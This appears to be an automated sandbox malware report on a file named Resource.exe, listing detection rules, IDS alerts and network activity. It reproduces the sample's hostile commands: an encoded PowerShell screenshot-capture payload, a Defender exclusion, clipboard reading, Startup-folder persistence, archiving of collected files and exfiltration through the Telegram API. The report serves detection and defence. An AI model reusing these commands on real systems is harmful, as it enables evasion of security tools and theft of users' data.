AAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 5772, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7112, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *, ProcessId: 8048, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2360, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe', ProcessId: 7232, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Suricata Signatures

ETPRO MALWARE SynthIndi Loader CnC Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T16:18:40.033280+0100	2857752	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49853	TCP

ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T16:18:39.056871+0100	2857751	1	A Network Trojan was detected	192.168.2.5	49853	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T16:18:39.056741+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49853	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Resource.exe	Virustotal: Detection: 71%			Perma Link
Source: Resource.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Resource.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Code function: 103_2_00007FF6185D901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

103_2_00007FF6185D901C

Source: Resource.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdbhP source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: Resource.exe, 00000001.00000002.2487117258.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Resource.exe, 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Resource.exe, 00000001.00000002.2486477048.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Resource.exe, Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Resource.exe, 00000001.00000002.2486921146.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Resource.exe, 00000001.00000002.2486713110.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdb source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000000.2365890239.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Resource.exe, 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6E60B7E4C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60B7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6E60B7E4C
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60A88D0 FindFirstFileExW,FindClose,	0_2_00007FF6E60A88D0
Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60C1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6E60C1EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	103_2_00007FF6185E46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	103_2_00007FF6185DE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186288E0 FindFirstFileExA,	103_2_00007FF6186288E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49853 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.5:49853 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.5:49853

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Resource.exe

Code function: 1_2_00007FF8B7E557E4 recv,

1_2_00007FF8B7E557E4

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.1.0

